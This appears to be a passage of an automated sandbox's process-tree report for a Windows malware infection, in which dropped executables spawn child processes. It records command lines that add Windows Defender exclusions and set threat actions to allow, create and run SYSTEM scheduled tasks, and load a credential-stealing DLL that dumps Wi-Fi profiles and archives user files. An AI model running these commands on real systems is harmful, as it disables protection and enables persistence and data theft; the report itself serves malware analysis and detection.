C:\Users\Admin\AppData\Local\Programs\Opera\opera.exe"C:\Users\Admin\AppData\Local\Programs\Opera\opera.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --enable-quic --no-appcompat-clear --start-stack-profiler --with-feature:cashback-assistant=on --with-feature:address-bar-dropdown-autocompleted-domains=off --with-feature:address-bar-dropdown-cities=on --with-feature:address-bar-keywords-monetization=on --with-feature:amazon-new-ids=on --with-feature:amp-requests-stats=on --with-feature:aria-command-line-in-extension=on --with-feature:aria-command-line-react=on --with-feature:cashback-assistant=on --with-feature:continue-on-booking=on --with-feature:continue-on-shopping-via-amp=off --with-feature:continue-shopping=on --with-feature:continue-shopping-2=on --with-feature:continue-shopping-5=on --with-feature:continue-shopping-structured-partners=on --with-feature:feature-remote-disable-updates-testing-flag=off --with-feature:feature-remote-updates-testing-flag=on --with-feature:game-maker-studio-integration=on --with-feature:gaming-api=on --with-feature:lucid-mode-hide-text=on --with-feature:native-crypto-wallet=on --with-feature:opera-startpage-special=on --with-feature:password-generator=off --with-feature:premium-valve-in=on --with-feature:proxy-switcher-ui-default-visible=on --with-feature:sd-suggestions-external=on --with-feature:session-restore-attribution=on --with-feature:shopping-corner=on --with-feature:sitecheck-age=on --with-feature:specific-keywords=on --with-feature:startpage-sync-banner-ref=on --with-feature:installer-experiment-test=off --with-feature:installer-bypass-launcher=on --ab_tests=GROW-2836-test-1:GROW-2836 --field-trial-handle=1752,i,14565450753250355976,94531689998791412,262144 --variations-seed-version --mojo-platform-channel-handle=1876 /prefetch:39⤵PID:376
-
-
C:\Users\Admin\AppData\Local\Programs\Opera\opera.exe"C:\Users\Admin\AppData\Local\Programs\Opera\opera.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --enable-quic --no-appcompat-clear --with-feature:cashback-assistant=on --with-feature:address-bar-dropdown-autocompleted-domains=off --with-feature:address-bar-dropdown-cities=on --with-feature:address-bar-keywords-monetization=on --with-feature:amazon-new-ids=on --with-feature:amp-requests-stats=on --with-feature:aria-command-line-in-extension=on --with-feature:aria-command-line-react=on --with-feature:cashback-assistant=on --with-feature:continue-on-booking=on --with-feature:continue-on-shopping-via-amp=off --with-feature:continue-shopping=on --with-feature:continue-shopping-2=on --with-feature:continue-shopping-5=on --with-feature:continue-shopping-structured-partners=on --with-feature:feature-remote-disable-updates-testing-flag=off --with-feature:feature-remote-updates-testing-flag=on --with-feature:game-maker-studio-integration=on --with-feature:gaming-api=on --with-feature:lucid-mode-hide-text=on --with-feature:native-crypto-wallet=on --with-feature:opera-startpage-special=on --with-feature:password-generator=off --with-feature:premium-valve-in=on --with-feature:proxy-switcher-ui-default-visible=on --with-feature:sd-suggestions-external=on --with-feature:session-restore-attribution=on --with-feature:shopping-corner=on --with-feature:sitecheck-age=on --with-feature:specific-keywords=on --with-feature:startpage-sync-banner-ref=on --with-feature:installer-experiment-test=off --with-feature:installer-bypass-launcher=on --ab_tests=GROW-2836-test-1:GROW-2836 --field-trial-handle=1740,i,14565450753250355976,94531689998791412,262144 --variations-seed-version --mojo-platform-channel-handle=2152 /prefetch:89⤵PID:3476
-
-
-
C:\Users\Admin\AppData\Local\Programs\Opera\opera.exe"C:\Users\Admin\AppData\Local\Programs\Opera\opera.exe" --show-intro-overlay --start-maximized8⤵PID:6880
-
C:\Users\Admin\AppData\Local\Programs\Opera\109.0.5097.45\opera_crashreporter.exeC:\Users\Admin\AppData\Local\Programs\Opera\109.0.5097.45\opera_crashreporter.exe --type=crashpad-handler /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\Crash Reports" "--crash-count-file=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\crash_count.txt" --url=https://crashstats-collector.opera.com/collector/submit --annotation=channel=Stable --annotation=plat=Win64 --annotation=prod=OperaDesktop --annotation=ver=109.0.5097.45 --initial-client-data=0x288,0x28c,0x290,0x284,0x294,0x7ffc01160650,0x7ffc01160660,0x7ffc011606709⤵PID:6496
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202404182228211\assistant\Assistant_109.0.5097.45_Setup.exe_sfx.exe"C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202404182228211\assistant\Assistant_109.0.5097.45_Setup.exe_sfx.exe"6⤵PID:5172
-
-
C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202404182228211\assistant\assistant_installer.exe"C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202404182228211\assistant\assistant_installer.exe" --version6⤵PID:2060
-
C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202404182228211\assistant\assistant_installer.exe"C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202404182228211\assistant\assistant_installer.exe" --type=crashpad-handler /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\Crash Reports" "--crash-count-file=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\crash_count.txt" --url=https://crashstats-collector.opera.com/collector/submit --annotation=channel=Stable --annotation=plat=Win32 --annotation=prod=OperaDesktop --annotation=ver=109.0.5097.45 --initial-client-data=0x230,0x234,0x238,0x20c,0x23c,0xfa6038,0xfa6044,0xfa60507⤵PID:1676
-
-
-
-
C:\Users\Admin\Pictures\njkrTFrTho9m8pktYQyvD45u.exe"C:\Users\Admin\Pictures\njkrTFrTho9m8pktYQyvD45u.exe"5⤵
- Modifies firewall policy service
- Executes dropped EXE
- Drops file in System32 directory
PID:6216
-
-
C:\Users\Admin\Pictures\98JN9KmVPfWhTtr0EFitFYHD.exe"C:\Users\Admin\Pictures\98JN9KmVPfWhTtr0EFitFYHD.exe"5⤵PID:3940
-
C:\Users\Admin\AppData\Local\Temp\7zS2313.tmp\Install.exe.\Install.exe /sQwdidHh "385118" /S6⤵PID:6348
-
C:\Windows\SysWOW64\forfiles.exe"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m where.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True"7⤵PID:1484
-
C:\Windows\SysWOW64\cmd.exe/C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True8⤵PID:1264
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True9⤵PID:652
-
C:\Windows\SysWOW64\Wbem\WMIC.exe"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True10⤵PID:4208
-
-
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "bWycNackLSywaqkmgR" /SC once /ST 22:30:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\JMPZeWvHhArmqROvY\NwfPJCCpQqPYDzK\CdevMnl.exe\" em /bQsite_idlbn 385118 /S" /V1 /F7⤵
- Creates scheduled task(s)
PID:6976
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "bWycNackLSywaqkmgR"7⤵PID:4332
-
-
-
-
C:\Users\Admin\Pictures\VFgTu512tXVIxQh4rRtDUZ98.exe"C:\Users\Admin\Pictures\VFgTu512tXVIxQh4rRtDUZ98.exe"5⤵PID:5288
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\1000200001\070.exe"C:\Users\Admin\AppData\Local\Temp\1000200001\070.exe"3⤵
- Executes dropped EXE
PID:5504 -
C:\Users\Admin\AppData\Local\Temp\is-TRJ1A.tmp\is-EAKIF.tmp"C:\Users\Admin\AppData\Local\Temp\is-TRJ1A.tmp\is-EAKIF.tmp" /SL4 $402CC "C:\Users\Admin\AppData\Local\Temp\1000200001\070.exe" 3710753 522244⤵
- Executes dropped EXE
- Loads dropped DLL
PID:2256 -
C:\Users\Admin\AppData\Local\CD-DVD-Runner\cddvdrunner2333.exe"C:\Users\Admin\AppData\Local\CD-DVD-Runner\cddvdrunner2333.exe" -i5⤵
- Executes dropped EXE
PID:6112
-
-
C:\Users\Admin\AppData\Local\CD-DVD-Runner\cddvdrunner2333.exe"C:\Users\Admin\AppData\Local\CD-DVD-Runner\cddvdrunner2333.exe" -s5⤵
- Executes dropped EXE
PID:5180
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\1000152001\jok.exe"C:\Users\Admin\AppData\Local\Temp\1000152001\jok.exe"2⤵
- Executes dropped EXE
PID:1584
-
-
C:\Users\Admin\AppData\Local\Temp\1000153001\swiiii.exe"C:\Users\Admin\AppData\Local\Temp\1000153001\swiiii.exe"2⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:5664 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"3⤵
- Loads dropped DLL
- Checks processor information in registry
- Suspicious behavior: EnumeratesProcesses
PID:5844
-
-
-
C:\Windows\SysWOW64\rundll32.exe"C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\c1ec479e5342a2\cred64.dll, Main2⤵
- Loads dropped DLL
PID:5760 -
C:\Windows\system32\rundll32.exe"C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\c1ec479e5342a2\cred64.dll, Main3⤵
- Blocklisted process makes network request
- Loads dropped DLL
- Suspicious behavior: EnumeratesProcesses
PID:5636 -
C:\Windows\system32\netsh.exenetsh wlan show profiles4⤵PID:6036
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command Compress-Archive -Path 'C:\Users\Admin\AppData\Local\Temp\_Files_\' -DestinationPath 'C:\Users\Admin\AppData\Local\Temp\687926120302_Desktop.zip' -CompressionLevel Optimal4⤵PID:6384
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\4d0ab15804\chrosha.exe"C:\Users\Admin\AppData\Local\Temp\4d0ab15804\chrosha.exe"2⤵PID:2896
-
-
C:\Users\Admin\AppData\Local\Temp\1000167001\build_1GyXIDXRUC.exe"C:\Users\Admin\AppData\Local\Temp\1000167001\build_1GyXIDXRUC.exe"2⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:5892 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"3⤵
- Suspicious behavior: EnumeratesProcesses
PID:1076
-
-
-
C:\Windows\SysWOW64\rundll32.exe"C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\c1ec479e5342a2\clip64.dll, Main2⤵
- Loads dropped DLL
PID:7092
-
-
C:\Users\Admin\AppData\Local\Temp\1000173001\Startup.exe"C:\Users\Admin\AppData\Local\Temp\1000173001\Startup.exe"2⤵
- Executes dropped EXE
PID:7120
-
-
C:\Users\Admin\AppData\Local\Temp\1000181001\file300un.exe"C:\Users\Admin\AppData\Local\Temp\1000181001\file300un.exe"2⤵PID:6752
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp\1000181001\file300un.exe" -Force3⤵PID:6944
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe"3⤵PID:6980
-
C:\Users\Admin\Pictures\zRIhIaiIacCrczvRsyyf3Sgh.exe"C:\Users\Admin\Pictures\zRIhIaiIacCrczvRsyyf3Sgh.exe"4⤵PID:2296
-
C:\Users\Admin\AppData\Local\Temp\u1rs.0.exe"C:\Users\Admin\AppData\Local\Temp\u1rs.0.exe"5⤵PID:6576
-
-
C:\Users\Admin\AppData\Local\Temp\Qg_Appv5.exe"C:\Users\Admin\AppData\Local\Temp\Qg_Appv5.exe"5⤵PID:6424
-
C:\Users\Admin\AppData\Local\Temp\Zqicom_beta\UniversalInstaller.exeC:\Users\Admin\AppData\Local\Temp\Zqicom_beta\UniversalInstaller.exe6⤵PID:5260
-
C:\Users\Admin\AppData\Roaming\Zqicom_beta\UniversalInstaller.exeC:\Users\Admin\AppData\Roaming\Zqicom_beta\UniversalInstaller.exe7⤵PID:760
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\SysWOW64\cmd.exe8⤵PID:7140
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeC:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe9⤵PID:6332
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\u1rs.1.exe"C:\Users\Admin\AppData\Local\Temp\u1rs.1.exe"5⤵PID:2208
-
-
-
C:\Users\Admin\Pictures\9ny0vBDWluLyTfCaNtKBp7tF.exe"C:\Users\Admin\Pictures\9ny0vBDWluLyTfCaNtKBp7tF.exe"4⤵PID:6972
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile5⤵PID:4216
-
-
C:\Users\Admin\Pictures\9ny0vBDWluLyTfCaNtKBp7tF.exe"C:\Users\Admin\Pictures\9ny0vBDWluLyTfCaNtKBp7tF.exe"5⤵PID:6664
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile6⤵PID:6504
-
-
-
-
C:\Users\Admin\Pictures\7acMrDpnWOYSM1Q4Gi4goSza.exe"C:\Users\Admin\Pictures\7acMrDpnWOYSM1Q4Gi4goSza.exe"4⤵PID:5388
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile5⤵PID:4324
-
-
C:\Users\Admin\Pictures\7acMrDpnWOYSM1Q4Gi4goSza.exe"C:\Users\Admin\Pictures\7acMrDpnWOYSM1Q4Gi4goSza.exe"5⤵PID:1976
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile6⤵PID:4672
-
-
-
-
C:\Users\Admin\Pictures\ODdYLJrR5YLqth876LnIWHZh.exe"C:\Users\Admin\Pictures\ODdYLJrR5YLqth876LnIWHZh.exe"4⤵PID:6148
-
-
C:\Users\Admin\Pictures\sLyozWOurlfiBWkCYDnQ2UoQ.exe"C:\Users\Admin\Pictures\sLyozWOurlfiBWkCYDnQ2UoQ.exe" --silent --allusers=04⤵PID:4240
-
C:\Users\Admin\Pictures\sLyozWOurlfiBWkCYDnQ2UoQ.exeC:\Users\Admin\Pictures\sLyozWOurlfiBWkCYDnQ2UoQ.exe --type=crashpad-handler /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\Crash Reports" "--crash-count-file=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\crash_count.txt" --url=https://crashstats-collector.opera.com/collector/submit --annotation=channel=Stable --annotation=plat=Win32 --annotation=prod=OperaDesktop --annotation=ver=109.0.5097.45 --initial-client-data=0x2a4,0x2a8,0x2ac,0x280,0x2b0,0x695ae1d0,0x695ae1dc,0x695ae1e85⤵PID:6676
-
-
C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\sLyozWOurlfiBWkCYDnQ2UoQ.exe"C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\sLyozWOurlfiBWkCYDnQ2UoQ.exe" --version5⤵PID:2420
-
-
-
C:\Users\Admin\Pictures\wWi32crPGAexzCVahsoNwHuk.exe"C:\Users\Admin\Pictures\wWi32crPGAexzCVahsoNwHuk.exe"4⤵PID:5672
-
C:\Users\Admin\AppData\Local\Temp\7zSA17B.tmp\Install.exe.\Install.exe /sQwdidHh "385118" /S5⤵PID:1968
-
C:\Windows\SysWOW64\forfiles.exe"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m where.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True"6⤵PID:6360
-
C:\Windows\SysWOW64\cmd.exe/C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True7⤵PID:2208
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True8⤵PID:2912
-
C:\Windows\SysWOW64\Wbem\WMIC.exe"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True9⤵PID:1456
-
-
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "bWycNackLSywaqkmgR" /SC once /ST 22:30:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\JMPZeWvHhArmqROvY\NwfPJCCpQqPYDzK\gNtRmnw.exe\" em /rZsite_idQJy 385118 /S" /V1 /F6⤵
- Creates scheduled task(s)
PID:4556
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "bWycNackLSywaqkmgR"6⤵PID:6768
-
-
-
-
C:\Users\Admin\Pictures\MkXEEP89qvsmADftB3F8uxjn.exe"C:\Users\Admin\Pictures\MkXEEP89qvsmADftB3F8uxjn.exe"4⤵PID:6376
-
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe"3⤵PID:7044
-
-
-
\??\c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k localsystemnetworkrestricted -s fhsvc1⤵PID:6572
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s WPDBusEnum1⤵PID:6580
-
C:\Users\Admin\AppData\Local\Temp\09fd851a4f\explorha.exeC:\Users\Admin\AppData\Local\Temp\09fd851a4f\explorha.exe1⤵PID:6200
-
\??\c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k localsystemnetworkrestricted -s fhsvc1⤵PID:3568
-
C:\Users\Admin\AppData\Local\Temp\1000150001\NewB.exeC:\Users\Admin\AppData\Local\Temp\1000150001\NewB.exe1⤵PID:1924
-
C:\Users\Admin\AppData\Local\Temp\JMPZeWvHhArmqROvY\NwfPJCCpQqPYDzK\gNtRmnw.exeC:\Users\Admin\AppData\Local\Temp\JMPZeWvHhArmqROvY\NwfPJCCpQqPYDzK\gNtRmnw.exe em /rZsite_idQJy 385118 /S1⤵PID:6328
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:64;"2⤵PID:5204
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:323⤵PID:6632
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:324⤵PID:5948
-
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:643⤵PID:376
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:323⤵PID:3732
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:643⤵PID:652
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:323⤵PID:4672
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:643⤵PID:2928
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:323⤵PID:6764
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:643⤵PID:3524
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:323⤵PID:2320
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:643⤵PID:2280
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:323⤵PID:5960
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:643⤵PID:4384
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:323⤵PID:4344
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:643⤵PID:6488
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:323⤵PID:6368
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:643⤵PID:764
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:323⤵PID:6192
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:643⤵PID:1884
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:323⤵PID:4464
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:643⤵PID:6932
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:323⤵PID:5128
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:643⤵PID:2016
-
-
